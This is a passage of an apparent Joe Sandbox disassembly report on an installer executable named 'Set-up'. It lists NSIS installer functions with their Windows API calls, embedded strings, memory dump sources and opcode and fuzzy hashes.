                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                      • String ID: F$A
                                      • API String ID: 3347642858-1281894373
                                      • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                      • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                      • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                      • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                      Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                      • CloseHandle.KERNEL32(?), ref: 00407212
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                      • API String ID: 1916479912-1189179171
                                      • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                      • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                      • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                      • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                      Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426EE3,74DF23A0,00000000), ref: 00406902
                                      • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                      • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                      • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                      • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426EE3,74DF23A0,00000000), ref: 00406A73
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                      • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 3581403547-1792361021
                                      • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                      • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                      • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                      • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                      Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                      Strings
                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: CreateInstance
                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                      • API String ID: 542301482-1377821865
                                      • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                      • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                      • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                      • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                      Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                      • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                      • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                      • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                      Function 0040737E Relevance: .3, Instructions: 303COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                      • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                      • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                      • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                      Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                      • lstrlenW.KERNEL32(?), ref: 004063F8
                                      • GetVersionExW.KERNEL32(?), ref: 00406456
                                        • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                      • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                      • GlobalFree.KERNEL32(?), ref: 00406509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                      • API String ID: 20674999-2124804629
                                      • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                      • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                      • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                      • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                      Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                      • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                      • GetSysColor.USER32(?), ref: 004041DB
                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                      • lstrlenW.KERNEL32(?), ref: 00404202
                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                        • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                      • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                      • SendMessageW.USER32(00000000), ref: 0040427D
                                      • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                      • SetCursor.USER32(00000000), ref: 004042FE
                                      • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                      • SetCursor.USER32(00000000), ref: 00404322
                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                      • String ID: F$N$open
                                      • API String ID: 3928313111-1104729357
                                      • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                      • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                      • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                      • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                      Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                      • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                      • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                      • wsprintfA.USER32 ref: 00406B79
                                      • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                      • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                      • CloseHandle.KERNEL32(?), ref: 00406C88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                      • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                      • API String ID: 565278875-3368763019
                                      • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                      • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                      • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                      • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                      Download Yara Rule
                                      APIs
                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                      • DeleteObject.GDI32(?), ref: 004010F6
                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                      • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                      • DeleteObject.GDI32(?), ref: 0040116E
                                      • EndPaint.USER32(?,?), ref: 00401177
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                      • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                      • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                      • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                      Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                      • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      Strings
                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                      • API String ID: 1641139501-220328614
                                      • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                      • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                      • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                      • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                      Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
